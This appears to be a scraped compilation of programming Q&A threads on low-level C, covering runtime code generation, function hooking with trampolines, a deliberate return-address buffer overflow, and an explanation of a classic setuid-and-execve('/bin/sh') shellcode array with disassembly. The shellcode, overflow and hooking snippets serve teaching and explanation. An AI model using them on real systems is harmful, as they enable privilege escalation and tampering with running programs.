Generating functions at runtime in C - c

I would like to generate a function at runtime in C. And by this I mean I would essentially like to allocate some memory, point at it and execute it via function pointer. I realize this is a very complex topic and my question is naïve. I also realize there are some very robust libraries out there that do this (e.g. nanojit).
But I would like to learn the technique, starting with the basics. Could someone knowledgeable give me a very simple example in C?
EDIT: The answer below is great but here is the same example for Windows:
#include <Windows.h>
#define MEMSIZE 100*1024*1024
typedef void (*func_t)(void);
int main() {
HANDLE proc = GetCurrentProcess();
LPVOID p = VirtualAlloc(
NULL,
MEMSIZE,
MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
func_t func = (func_t)p;
PDWORD code = (PDWORD)p;
code[0] = 0xC3; // ret
if(FlushInstructionCache(
proc,
NULL,
0))
{
func();
}
CloseHandle(proc);
VirtualFree(p, 0, MEM_RELEASE);
return 0;
}

As said previously by other posters, you'll need to know your platform pretty well.
Ignoring the issue of casting a object pointer to a function pointer being, technically, UB, here's an example that works for x86/x64 OS X (and possibly Linux too). All the generated code does is return to the caller.
#include <unistd.h>
#include <sys/mman.h>
typedef void (*func_t)(void);
int main() {
/*
* Get a RWX bit of memory.
* We can't just use malloc because the memory it returns might not
* be executable.
*/
unsigned char *code = mmap(NULL, getpagesize(),
PROT_READ|PROT_EXEC|PROT_WRITE,
MAP_SHARED|MAP_ANON, 0, 0);
/* Technically undefined behaviour */
func_t func = (func_t) code;
code[0] = 0xC3; /* x86 'ret' instruction */
func();
return 0;
}
Obviously, this will be different across different platforms but it outlines the basics needed: get executable section of memory, write instructions, execute instructions.

This requires you to know your platform. For instance, what is the C calling convention on your platform? Where are parameters stored? What register holds the return value? What registers must be saved and restored? Once you know that, you can essentially write some C code that assembles code into a block of memory, then cast that memory into a function pointer (though this is technically forbidden in ANSI C, and will not work depending if your platform marks some pages of memory as non-executable aka NX bit).
The simple way to go about this is simply to write some code, compile it, then disassemble it and look at what bytes correspond to which instructions. You can write some C code that fills allocated memory with that collection of bytes and then casts it to a function pointer of the appropriate type and executes.
It's probably best to start by reading the calling conventions for your architecture and compiler. Then learn to write assembly that can be called from C (i.e., follows the calling convention).

If you have tools, they can help you get some things right easier. For example, instead of trying to design the right function prologue/epilogue, I can just code this in C:
int foo(void* Data)
{
return (Data != 0);
}
Then (MicrosoftC under Windows) feed it to "cl /Fa /c foo.c". Then I can look at "foo.asm":
_Data$ = 8
; Line 2
push ebp
mov ebp, esp
; Line 3
xor eax, eax
cmp DWORD PTR _Data$[ebp], 0
setne al
; Line 4
pop ebp
ret 0
I could also use "dumpbin /all foo.obj" to see that the exact bytes of the function were:
00000000: 55 8B EC 33 C0 83 7D 08 00 0F 95 C0 5D C3
Just saves me some time getting the bytes exactly right...

Related

Using memcmp with DOS far pointers

I have an old program I wrote in 1995. It is written with Borland C and DOS 6.22. It uses a far model with data in different segments. The program uses EMS memory and that is why the pointers need to be far. I need to use memcmp( a, b, c) but I get an error "Warning panel.c 325: Suspicious pointer conversion in function enterPanel" and I suspect that is because I have a far pointer. Is there a far version of memcpy that I should be using? (I searched for such a function but couldn't find it). You may be wondering why I don't just code a loop but I want to use the intrinsic capability to get the most speed.
Here is a snip from my code:
ASM function
------------
align 4
public _mainMem
_mainMem label dword
mainMem dd ? ;pointer to main memory (if no EMS)
mov ax,emsSegment ;segment of EMS page frame
mov word ptr mainMem+2,ax
mov word ptr mainMem,0
C program
---------
extern unsigned short _far *mainMem;
short watchArray[80];
unsigned int watchAddress, watchLen;
memcmp((_far*)&mainMem[watchAddress], watchArray, watchLen)
Also I tried removing the (_far*).

Writing a Trampoline Function

I have managed to overwrite the first few bytes of a function in memory and detour it to my own function. I'm now having problems creating a trampoline function to bounce control back over to the real function.
This is a second part to my question here.
BYTE *buf = (BYTE*)VirtualAlloc(buf, 12, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
void (*ptr)(void) = (void (*)(void))buf;
vm_t* VM_Create( const char *module, intptr_t (*systemCalls)(intptr_t *), vmInterpret_t interpret )
{
MessageBox(NULL, L"Oh Snap! VM_Create Hooked!", L"Success!", MB_OK);
ptr();
return NULL;//control should never get this far
}
void Hook_VM_Create(void)
{
DWORD dwBackup;
VirtualProtect((void*)0x00477C3E, 7, PAGE_EXECUTE_READWRITE, &dwBackup);
//save the original bytes
memset(buf, 0x90, sizeof(buf));
memcpy(buf, (void*)0x00477C3E, 7);
//finish populating the buffer with the jump instructions to the original functions
BYTE *jmp2 = (BYTE*)malloc(5);
int32_t offset2 = ((int32_t)0x00477C3E+7) - ((int32_t)&buf+12);
memset((void*)jmp2, 0xE9, 1);
memcpy((void*)(jmp2+1), &offset2, sizeof(offset2));
memcpy((void*)(buf+7), jmp2, 5);
VirtualProtect((void*)0x00477C3E, 7, PAGE_EXECUTE_READ, &dwBackup);
}
0x00477C3E is the address of the function that has been overwritten. The asm for the original function are saved to buf before i over write them. Then my 5 byte jmp instruction is added to buf to return to the rest of the original function.
The problem arises when ptr() is called, the program crashes. When debugging the site it crashes at does not look like my ptr() function, however double checking my offset calculation looks correct.
NOTE: superfluous code is omitted to make reading through everything easier
EDIT: This is what the ptr() function looks like in ollydbg
0FFB0000 55 PUSH EBP
0FFB0001 57 PUSH EDI
0FFB0002 56 PUSH ESI
0FFB0003 53 PUSH EBX
0FFB0004 83EC 0C SUB ESP,0C
0FFB0007 -E9 F1484EFD JMP 0D4948FD
So it would appear as though my offset calculation is wrong.
So your buf[] ends up containing 2 things:
7 first bytes of the original instruction
jmp
Then you transfer control to buf. Is it guaranteed that the first 7 bytes contain only whole instructions? If not, you can crash while or after executing the last, incomplete instruction beginning in those 7 bytes.
Is it guaranteed that the instructions in those 7 bytes do not do any EIP-relative calculations (this includes instructions with EIP-relative addressing such as jumps and calls primarily)? If not, continuation in the original function won't work properly and probably will end up crashing the program.
Does the original function take any parameters? If it does, simply doing ptr(); will make that original code work with garbage taken from the registers and/or stack (depends on the calling convention) and can crash.
EDIT: One more thing. Use buf+12 instead of &buf+12. In your code buf is a pointer, not array.

Buffer overflow in C

I'm attempting to write a simple buffer overflow using C on Mac OS X 10.6 64-bit. Here's the concept:
void function() {
char buffer[64];
buffer[offset] += 7; // i'm not sure how large offset needs to be, or if
// 7 is correct.
}
int main() {
int x = 0;
function();
x += 1;
printf("%d\n", x); // the idea is to modify the return address so that
// the x += 1 expression is not executed and 0 gets
// printed
return 0;
}
Here's part of main's assembler dump:
...
0x0000000100000ebe <main+30>: callq 0x100000e30 <function>
0x0000000100000ec3 <main+35>: movl $0x1,-0x8(%rbp)
0x0000000100000eca <main+42>: mov -0x8(%rbp),%esi
0x0000000100000ecd <main+45>: xor %al,%al
0x0000000100000ecf <main+47>: lea 0x56(%rip),%rdi # 0x100000f2c
0x0000000100000ed6 <main+54>: callq 0x100000ef4 <dyld_stub_printf>
...
I want to jump over the movl instruction, which would mean I'd need to increment the return address by 42 - 35 = 7 (correct?). Now I need to know where the return address is stored so I can calculate the correct offset.
I have tried searching for the correct value manually, but either 1 gets printed or I get abort trap – is there maybe some kind of buffer overflow protection going on?
Using an offset of 88 works on my machine. I used Nemo's approach of finding out the return address.
This 32-bit example illustrates how you can figure it out, see below for 64-bit:
#include <stdio.h>
void function() {
char buffer[64];
char *p;
asm("lea 4(%%ebp),%0" : "=r" (p)); // loads address of return address
printf("%d\n", p - buffer); // computes offset
buffer[p - buffer] += 9; // 9 from disassembling main
}
int main() {
volatile int x = 7;
function();
x++;
printf("x = %d\n", x); // prints 7, not 8
}
On my system the offset is 76. That's the 64 bytes of the buffer (remember, the stack grows down, so the start of the buffer is far from the return address) plus whatever other detritus is in between.
Obviously if you are attacking an existing program you can't expect it to compute the answer for you, but I think this illustrates the principle.
(Also, we are lucky that +9 does not carry out into another byte. Otherwise the single byte increment would not set the return address how we expected. This example may break if you get unlucky with the return address within main)
I overlooked the 64-bitness of the original question somehow. The equivalent for x86-64 is 8(%rbp) because pointers are 8 bytes long. In that case my test build happens to produce an offset of 104. In the code above substitute 8(%%rbp) using the double %% to get a single % in the output assembly. This is described in this ABI document. Search for 8(%rbp).
There is a complaint in the comments that 4(%ebp) is just as magic as 76 or any other arbitrary number. In fact the meaning of the register %ebp (also called the "frame pointer") and its relationship to the location of the return address on the stack is standardized. One illustration I quickly Googled is here. That article uses the terminology "base pointer". If you wanted to exploit buffer overflows on other architectures it would require similarly detailed knowledge of the calling conventions of that CPU.
Roddy is right that you need to operate on pointer-sized values.
I would start by reading values in your exploit function (and printing them) rather than writing them. As you crawl past the end of your array, you should start to see values from the stack. Before long you should find the return address and be able to line it up with your disassembler dump.
Disassemble function() and see what it looks like.
Offset needs to be negative positive, maybe 64+8, as it's a 64-bit address. Also, you should do the '+7' on a pointer-sized object, not on a char. Otherwise if the two addresses cross a 256-byte boundary you will have exploited your exploit....
You might try running your code in a debugger, stepping each assembly line at a time, and examining the stack's memory space as well as registers.
I always like to operate on nice data types, like this one:
struct stackframe {
char *sf_bp;
char *sf_return_address;
};
void function() {
/* the following code is dirty. */
char *dummy;
dummy = (char *)&dummy;
struct stackframe *stackframe = dummy + 24; /* try multiples of 4 here. */
/* here starts the beautiful code. */
stackframe->sf_return_address += 7;
}
Using this code, you can easily check with the debugger whether the value in stackframe->sf_return_address matches your expectations.

can anyone explain this code to me?

WARNING: This is an exploit. Do not execute this code.
//shellcode.c
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main() {
int *ret; //ret pointer for manipulating saved return.
ret = (int *)&ret + 2; //setret to point to the saved return
//value on the stack.
(*ret) = (int)shellcode; //change the saved return value to the
//address of the shellcode, so it executes.
}
can anyone give me a better explanation ?
Apparently, this code attempts to change the stack so that when the main function returns, program execution does not return regularly into the runtime library (which would normally terminate the program), but would jump instead into the code saved in the shellcode array.
1) int *ret;
defines a variable on the stack, just beneath the main function's arguments.
2) ret = (int *)&ret + 2;
lets the ret variable point to a int * that is placed two ints above ret on the stack. Supposedly that's where the return address is located where the program will continue when main returns.
2) (*ret) = (int)shellcode;
The return address is set to the address of the shellcode array's contents, so that shellcode's contents will be executed when main returns.
shellcode seemingly contains machine instructions that possibly do a system call to launch /bin/sh. I could be wrong on this as I didn't actually disassemble shellcode.
P.S.: This code is machine- and compiler-dependent and will possibly not work on all platforms.
Reply to your second question:
and what happens if I use
ret=(int)&ret +2 and why did we add 2?
why not 3 or 4??? and I think that int
is 4 bytes so 2 will be 8bytes no?
ret is declared as an int*, therefore assigning an int (such as (int)&ret) to it would be an error. As to why 2 is added and not any other number: apparently because this code assumes that the return address will lie at that location on the stack. Consider the following:
This code assumes that the call stack grows downward when something is pushed on it (as it indeed does e.g. with Intel processors). That is the reason why a number is added and not subtracted: the return address lies at a higher memory address than automatic (local) variables (such as ret).
From what I remember from my Intel assembly days, a C function is often called like this: First, all arguments are pushed onto the stack in reverse order (right to left). Then, the function is called. The return address is thus pushed on the stack. Then, a new stack frame is set up, which includes pushing the ebp register onto the stack. Then, local variables are set up on the stack beneath all that has been pushed onto it up to this point.
Now I assume the following stack layout for your program:
+-------------------------+
| function arguments | |
| (e.g. argv, argc) | | (note: the stack
+-------------------------+ <-- ss:esp + 12 | grows downward!)
| return address | |
+-------------------------+ <-- ss:esp + 8 V
| saved ebp register |
+-------------------------+ <-- ss:esp + 4 / ss:ebp - 0 (see code below)
| local variable (ret) |
+-------------------------+ <-- ss:esp + 0 / ss:ebp - 4
At the bottom lies ret (which is a 32-bit integer). Above it is the saved ebp register (which is also 32 bits wide). Above that is the 32-bit return address. (Above that would be main's arguments -- argc and argv -- but these aren't important here.) When the function executes, the stack pointer points at ret. The return address lies 64 bits "above" ret, which corresponds to the + 2 in
ret = (int*)&ret + 2;
It is + 2 because ret is a int*, and an int is 32 bit, therefore adding 2 means setting it to a memory location 2 × 32 bits (=64 bits) above (int*)&ret... which would be the return address' location, if all the assumptions in the above paragraph are correct.
Excursion: Let me demonstrate in Intel assembly language how a C function might be called (if I remember correctly -- I'm no guru on this topic so I might be wrong):
// first, push all function arguments on the stack in reverse order:
push argv
push argc
// then, call the function; this will push the current execution address
// on the stack so that a return instruction can get back here:
call main
// (afterwards: clean up stack by removing the function arguments, e.g.:)
add esp, 8
Inside main, the following might happen:
// create a new stack frame and make room for local variables:
push ebp
mov ebp, esp
sub esp, 4
// access return address:
mov edi, ss:[ebp+4]
// access argument 'argc'
mov eax, ss:[ebp+8]
// access argument 'argv'
mov ebx, ss:[ebp+12]
// access local variable 'ret'
mov edx, ss:[ebp-4]
...
// restore stack frame and return to caller (by popping the return address)
mov esp, ebp
pop ebp
retf
See also: Description of the procedure call sequence in C for another explanation of this topic.
The actual shellcode is:
(gdb) x /25i &shellcode
0x804a040 <shellcode>: xor %eax,%eax
0x804a042 <shellcode+2>: xor %ebx,%ebx
0x804a044 <shellcode+4>: mov $0x17,%al
0x804a046 <shellcode+6>: int $0x80
0x804a048 <shellcode+8>: jmp 0x804a069 <shellcode+41>
0x804a04a <shellcode+10>: pop %esi
0x804a04b <shellcode+11>: mov %esi,0x8(%esi)
0x804a04e <shellcode+14>: xor %eax,%eax
0x804a050 <shellcode+16>: mov %al,0x7(%esi)
0x804a053 <shellcode+19>: mov %eax,0xc(%esi)
0x804a056 <shellcode+22>: mov $0xb,%al
0x804a058 <shellcode+24>: mov %esi,%ebx
0x804a05a <shellcode+26>: lea 0x8(%esi),%ecx
0x804a05d <shellcode+29>: lea 0xc(%esi),%edx
0x804a060 <shellcode+32>: int $0x80
0x804a062 <shellcode+34>: xor %ebx,%ebx
0x804a064 <shellcode+36>: mov %ebx,%eax
0x804a066 <shellcode+38>: inc %eax
0x804a067 <shellcode+39>: int $0x80
0x804a069 <shellcode+41>: call 0x804a04a <shellcode+10>
0x804a06e <shellcode+46>: das
0x804a06f <shellcode+47>: bound %ebp,0x6e(%ecx)
0x804a072 <shellcode+50>: das
0x804a073 <shellcode+51>: jae 0x804a0dd
0x804a075 <shellcode+53>: add %al,(%eax)
This corresponds to roughly
setuid(0);
x[0] = "/bin/sh"
x[1] = 0;
execve("/bin/sh", &x[0], &x[1])
exit(0);
That string is from an old document on buffer overflows, and will execute /bin/sh. Since it's malicious code (well, when paired with a buffer exploit) - you should really include it's origin next time.
From that same document, how to code stack based exploits :
/* the shellcode is hex for: */
#include <stdio.h>
main() {
char *name[2];
name[0] = "sh";
name[1] = NULL;
execve("/bin/sh",name,NULL);
}
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0
\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c
\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
The code you included causes the contents of shellcode[] to be executed, running execve, and providing access to the shell. And the term Shellcode? From Wikipedia :
In computer security, a shellcode is a
small piece of code used as the
payload in the exploitation of a
software vulnerability. It is called
"shellcode" because it typically
starts a command shell from which the
attacker can control the compromised
machine. Shellcode is commonly written
in machine code, but any piece of code
that performs a similar task can be
called shellcode.
Without looking up all the actual opcodes to confirm, the shellcode array contains the machine code necessary to exec /bin/sh. This shellcode is machine code carefully constructed to perform the desired operation on a specific target platform and not to contain any null bytes.
The code in main() is changing the return address and the flow of execution in order to cause the program to spawn a shell by having the instructions in the shellcode array executed.
See Smashing The Stack For Fun And Profit for a description on how shellcode such as this can be created and how it might be used.
The string contains a series of bytes represented in hexadecimal.
The bytes encode a series of instructions for a particular processor on a particular platform — hopefully, yours. (Edit: if it's malware, hopefully not yours!)
The variable is defined just to get a handle to the stack. A bookmark, if you will. Then pointer arithmetic is used, again platform-dependent, to manipulate the state of the program to cause the processor to jump to and execute the bytes in the string.
Each \xXX is a hexadecimal number. One, two or three of such numbers together form an op-code (google for it). Together it forms assembly which can be executed by the machine more or less directly. And this code tries to execute the shellcode.
I think the shellcode tries to spawn a shell.
This is just spawn /bin/sh, for example in C like execve("/bin/sh", NULL, NULL);

C - How to create a pattern in code segment to recognize it in memory dump?

I dump my RAM (a piece of it - code segment only) in order to find where is which C function being placed. I have no map file and I don't know what boot/init routines exactly do.
I load my program into RAM, then if I dump the RAM, it is very hard to find exactly where is what function. I'd like to use different patterns build in the C source, to recognize them in the memory dump.
I've tryed to start every function with different first variable containing name of function, like:
char this_function_name[]="main";
but it doesn't work, because this string will be placed in the data segment.
I have simple 16-bit RISC CPU and an experimental proprietary compiler (no GCC or any well-known). The system has 16Mb of RAM, shared with other applications (bootloader, downloader). It is almost impossible to find say a unique sequence of N NOPs or smth. like 0xABCD. I would like to find all functions in RAM, so I need unique identificators of functions visible in RAM-dump.
What would be the best pattern for code segment?
If it were me, I'd use the symbol table, e.g. "nm a.out | grep main". Get the real address of any function you want.
If you really have no symbol table, make your own.
struct tab {
void *addr;
char name[100]; // For ease of searching, use an array.
} symtab[] = {
{ (void*)main, "main" },
{ (void*)otherfunc, "otherfunc" },
};
Search for the name, and the address will immediately preceed it. Goto address. ;-)
If your compiler has inline asm you can use it to create a pattern. Write some NOP instructions which you can easily recognize by opcodes in memory dump:
MOV r0,r0
MOV r0,r0
MOV r0,r0
MOV r0,r0
How about a completely different approach to your real problem, which is finding a particular block of code: Use diff.
Compile the code once with the function in question included, and once with it commented out. Produce RAM dumps of both. Then, diff the two dumps to see what's changed -- and that will be the new code block. (You may have to do some sort of processing of the dumps to remove memory addresses in order to get a clean diff, but the order of instructions ought to be the same in either case.)
Numeric constants are placed in the code segment, encoded in the function's instructions. So you could try to use magic numbers like 0xDEADBEEF and so on.
I.e. here's the disassembly view of a simple C function with Visual C++:
void foo(void)
{
00411380 push ebp
00411381 mov ebp,esp
00411383 sub esp,0CCh
00411389 push ebx
0041138A push esi
0041138B push edi
0041138C lea edi,[ebp-0CCh]
00411392 mov ecx,33h
00411397 mov eax,0CCCCCCCCh
0041139C rep stos dword ptr es:[edi]
unsigned id = 0xDEADBEEF;
0041139E mov dword ptr [id],0DEADBEEFh
You can see the 0xDEADBEEF making it into the function's source. Note that what you actually see in the executable depends on the endianness of the CPU (tx. Richard).
This is a x86 example. But RISC CPUs (MIPS, etc) have instructions moving immediates into registers - these immediates can have special recognizable values as well (although only 16-bit for MIPS, IIRC).
Psihodelia - it's getting harder and harder to catch your intention. Is it just a single function you want to find? Then can't you just place 5 NOPs one after another and look for them? Do you control the compiler/assembler/linker/loader? What tools are at your disposal?
As you noted, this:
char this_function_name[]="main";
... will end up setting a pointer in your stack to a data segment containing the string. However, this:
char this_function_name[]= { 'm', 'a', 'i', 'n' };
... will likely put all these bytes in your stack so you will be able to recognize the string in your code (I just tried it on my platform).
Hope this helps
Why not get each function to dump its own address. Something like this:
void* fnaddr( char* fname, void* addr )
{
printf( "%s\t0x%p\n", fname, addr ) ;
return addr ;
}
void test( void )
{
static void* fnaddr_dummy = fnaddr( __FUNCTION__, test ) ;
}
int main (int argc, const char * argv[])
{
static void* fnaddr_dummy = fnaddr( __FUNCTION__, main ) ;
test() ;
test() ;
}
By making fnaddr_dummy static, the dump is done once per-function. Obviously you would need to adapt fnaddr() to support whatever output or logging means you have on your system. Unfortunately, if the system performs lazy initialisation, you'll only get the addresses of the functions that are actually called (which may be good enough).
You could start each function with a call to the same dummy function like:
void identifyFunction( unsigned int identifier)
{
}
Each of your functions would call the identifyFunction-function with a different parameter (1, 2, 3, ...). This will not give you a magic mapfile, but when you inspect the code dump you should be able to quickly find out where the identifyFunction is because there will be lots of jumps to that address. Next scan for those jump and check before the jump to see what parameter is passed. Then you can make your own mapfile. With some scripting this should be fairly automatic.

Resources